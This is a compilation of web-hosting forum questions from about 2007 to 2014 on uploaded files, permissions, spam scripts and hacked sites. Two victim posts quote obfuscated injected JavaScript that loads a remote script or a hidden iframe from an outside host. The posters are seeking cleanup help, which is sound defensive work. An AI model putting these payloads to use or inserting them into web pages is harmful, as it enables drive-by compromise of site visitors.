Stopping Malicious Files From Being Uploaded (cPanel)

Jun 27, 2009

I want to know if there is a way to stop malicious files from being uploaded to my VPS via FTP, cPanel, etc.

I have been told there is a way to do this, but I haven't been told how.

Basically, I want to know if there is something where I can add a list of keywords that appear in the malicious files, so that whatever it is will stop them from being uploaded or, if they do manage to get uploaded onto my VPS, make them not work.

I am looking into this as I had an issue before where someone uploaded a shell onto my server :@ Luckily it didn't cause any damage and he didn't get anywhere, but I still want to be safe.


Hacker Adds Malicious Code To All Html And Php Files

Apr 30, 2009

We have been having a strange hacking problem on our server, and we cannot seem to find out how they are managing to accomplish it. I am just wondering if anyone here may be able to offer any suggestions on this?

The problem:

On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are separate and do not share login information. This is the 2nd time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful; however, at the moment they cannot seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerability?

[url]


Filter Uploaded Files

Mar 5, 2008

I want to filter any uploaded files, and I have put this line in php.ini:
suhosin.upload.verification_script = /my path

But my problem is that so far I cannot write this script. (Disable upload of PHP files)


Problem With Files Owned By 'nobody' When Uploaded

Aug 4, 2007

I used to have my Apache 1.3.37 with PHP compiled as a CGI. Whenever I have a PHP script (say, vBulletin forum software) that allows file uploads, files will be uploaded with the correct userid and groupid on the server. However, once I compiled PHP as an ISAPI module, the files will be uploaded but will be owned by 'nobody'. Of course I can log in as root and chown them back to the right user, but it's a hassle if there are multiple user accounts on the server and they're using PHP software on their end. If someone is using an FTP program and tries to overwrite an uploaded file that's owned by nobody, it will not let them do so. Is there a way to fix this, or a change to the config files that would fix it?


How To Find How And Who Uploaded Files - Spam - Action I Can Take

Mar 27, 2009

I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.

Today I was contacted by someone: "Are you the owner of xxxx.net?" So I informed them that yes, it was my server, and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames; it'd use a forename and a surname, then send it to popular free mail services. The email contained ramblings about new world order and promoted a website.

How can I find out how they got the files uploaded to the account, and what action can I take? I checked the whois for the domain and have their contact information; however, it's a large site, so I'm doubtful that the owner did it. I don't want my server's IPs being blacklisted for spam :|


Limit The Size Of Uploaded Files Using VSFTPD

May 26, 2007

I have a plain RHEL 4 server, and I'm using the vsftpd server. I cannot find an option to specify the max size for uploaded files... does anybody know something about this?


Files Uploaded Via Scripts & Joomla Have 600 Permissions

Jun 26, 2007

I've recently started experiencing some issues where files uploaded through Joomla or some other scripts (mostly PHP) inherit a permission of 600. Prior to updates being done on the server I'm hosted on, uploaded files received 644 permissions and all things worked great.

I've checked the umask that is assigned to the shell (022) and have ruled that out as a problem.


Plesk 11.x / Linux :: Can't See Files Which Are Uploaded With Script

Mar 1, 2014

I am using an upload script for my files. After upload I can't see them on FTP, but I can see them in the panel file manager.


Apache :: Created FTP Account With Vsftp And Files Uploaded Are Not Readable

Jan 17, 2014

I created an FTP account with vsftp, and files uploaded are not readable via www-data.


[newmailcgi] Recently Uploaded CGI Scripts On CPanel Server

Dec 11, 2007

Whenever someone uploads or re-uploads to my server a file relating to a CGI script that sends mail, I get an email with something like:

Quote:

Note: If this is the first time you received this mail, it contains the history for the entire month so far.

Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

/home/xxxxxxx/public_html/followup/send2.php:106: if($sc == "buchanan") {
/home/xxxxxxx/public_html/followup/send2.php:107: mail($email, $subject, $creative, $headers);
/home/xxxxxxx/public_html/followup/send2.php:108: }
---
/home/xxxxxxx/public_html/followup/send.php:100: if($sc == "buchanan") {
/home/xxxxxxx/public_html/followup/send.php:101: mail($email, $subject, $creative, $headers);
/home/xxxxxxx/public_html/followup/send.php:102: }
---

What steps can I take to actually inspect them to ensure they are not sending out SPAM?


Cgi With Malicious Code

Jul 16, 2009

I have serious problems with ".cgi" files containing malicious code; the person who has these files uses them to send spam through my server without any kind of block. How could I block this type of spam sending via ".cgi" files?

CentOS 5.2 - 64bits

WHM+cPanel

Example of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi


Malicious Javascript

Mar 18, 2009

We are having a problem with a number of our websites hosted on a Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.

An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>

New pages have been created on a number of websites as well as the above code inserted into existing pages.

After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.


Mulcishell Malicious Script

May 11, 2009

Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)


Sites With Malicious Code

Oct 27, 2008

All sites on my server have malicious code:

</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

How can I locate this code in my sites using grep?

My server runs CentOS.


Malicious Mail Sent Out Via MailEnable On Localhost

Jun 5, 2008

We received a report of a malicious mail being sent from our servers. The problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs show that the connection was made from 127.0.0.1 to the smtp service, but that's it.

We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.


Malicious Code Added To Index File

Jul 9, 2008

I've been having an issue with one of my sites where someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.

I have a dedicated server and have already upgraded MySQL to the latest version, as I thought that might work, but it hasn't.


Google Shows That My Site Has Malicious Code And Blocked Me

Apr 5, 2009

For the first time in my site's life (a 10-year-old site), Google blocked it. When you type my site, Google says that my site has malicious code in it. As we found out, the problem in my site came from the company where I host it. We cleared the malicious code from all the files and now it's all OK. I want to ask if anyone knows from experience how many days it will take Google to check my site again to see if everything is OK. Six hours ago I sent them, via Webmaster Tools, a request to examine my site again, but I don't know how they will do this. So I am asking any of you who had the same experience. Any help will be appreciated. Please help me with anything you think might be useful for getting my site back in Google correctly!


Stop Exploits And Malicious Execs: Safe Mode

Mar 8, 2008

I decided to apply PHP safe mode to my servers, considering:

- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)

- I cannot restrict at all via UID/GID method at bins due to several problems..

Safe mode is the final solution, as I only need the "safe_mode_exec_dir" config to set a folder with the necessary binaries... this will stop the nobody user (Apache) from executing whatever it wants, like perl, binaries uploaded to a public insecure folder (exploits), or anything else... people could only exec() the binaries I want and where I want. This will finally stop 95% of my hack problems.

Well. The problem is that safe_mode is either enabled or not; you cannot set or disable certain features of this safe mode, like UID/GID checks (*******!)...

I am trying to configure so only "safe_mode_exec_dir" would apply, so:

- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"
(tested)

- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...

- safe_mode_exec_dir = "/usr/phpbin/"
Great! With symbolic links in... the best solution available for me.

- open_basedir = "/home/"
(for fopen, etc...)

OK, OK.. but there are problems.. for example this one:

Quote:

Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823

Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...

Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...

Can you share your safe_mode configs or solutions for this problem?


FTP - Uploaded File Not Overwriting

Jan 5, 2008

Does anybody understand what is going on here?

Here is the problem:

I log in to FTP and I try to upload an updated file (the file already exists on the server). It prompts me to overwrite and I say yes, but when I refresh/check the site the page hasn't changed. I then tried uploading the file again and it still shows the existing file size (so I know it hasn't been replaced).

Any idea why it is not overwriting?

The files are CHOWNed by the owner (FTP user), which is myself.


Uploaded File Size 0 KB

Feb 2, 2008

I uploaded my files to the web server (HTML, image file and CSS file), but strangely, after uploading them to the server, all the files I uploaded have a size of 0 KB. I uploaded them using WS FTP.

Is there something wrong with the way I uploaded them?


Someone's Uploaded A Phishing Site

Jul 31, 2007

Someone's managed to upload a phishing site to my VPS.

How do they normally achieve this? There has been no unauthorised root access, as I get an e-mail each time someone logs in as root.

Is it likely they've just managed to guess my ftp password, or is it going to have something to do with a script running elsewhere?

I've got solarvps looking at it now.


Shell Uploaded - Site Hacked - How To Trace ?

Nov 6, 2008

Shell uploaded - Site hacked - How to trace?

Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....


How Many Websites Can Be Uploaded To One Single Webspace Account

Oct 20, 2008

How many websites can be uploaded to one single webspace account?


Apache :: How To Discover Which Php File Allows Malicious File Upload

Oct 10, 2014

I manage a Linux Apache webserver with a few WordPress blogs, and from time to time I see someone inject a malicious .php file into the wp-content/uploads/2014/10/ directory.

I think it's some bad plugin or theme, but there are several blogs. I upgrade and update WP, but

how can I set up some monitor to tell me which PHP file (or even which line in a PHP file) injected that malicious .php? I have Linux root access, so I can set up anything.


CPanel/moving Files

Jan 28, 2007

I have about 20 gigs of pictures that I have already uploaded to my server, but they're just sitting there in a directory listing tree.

How can I import all of those pictures into, say Coppermine or 4images or the like, without having to do each one manually?


Can't Delete Files From CPanel Server

May 11, 2007

I've been using CPanel for a few years now and I've encountered an error that I have no clue how to fix it. Basically the files have been with me for the last two or three years and I've changed them from server to server. I'd say these files have been through about four or five servers. The funny thing is I can't delete any of these files. The files are in a folder under public_html and I can't delete the folder or any of the files or folders inside of that folder. I've tried through FTP and through CPanel.

The FTP error I get (I'm using WS_FTP Pro) is:

# transferred 4277 bytes in 0.063 seconds, 534.625 Kbps ( 66.828 Kbps), transfer succeeded.
226-Options: -a -l
226 58

The CPanel error I get (through File Manager) is:

[a fatal error or timeout occurred while processing this directive]

and under the trash can in File Manager:

Unable to change directory to /home/mydirectory/.trash! You do not seem to have access permissions! (System Error: Permission denied)

I even CHMODed all of the files to 777. I don't know how to get rid of these old files, how do I do it? I also have root to the server if that helps.

Copyrights 2005-15 www.BigResource.com, All rights reserved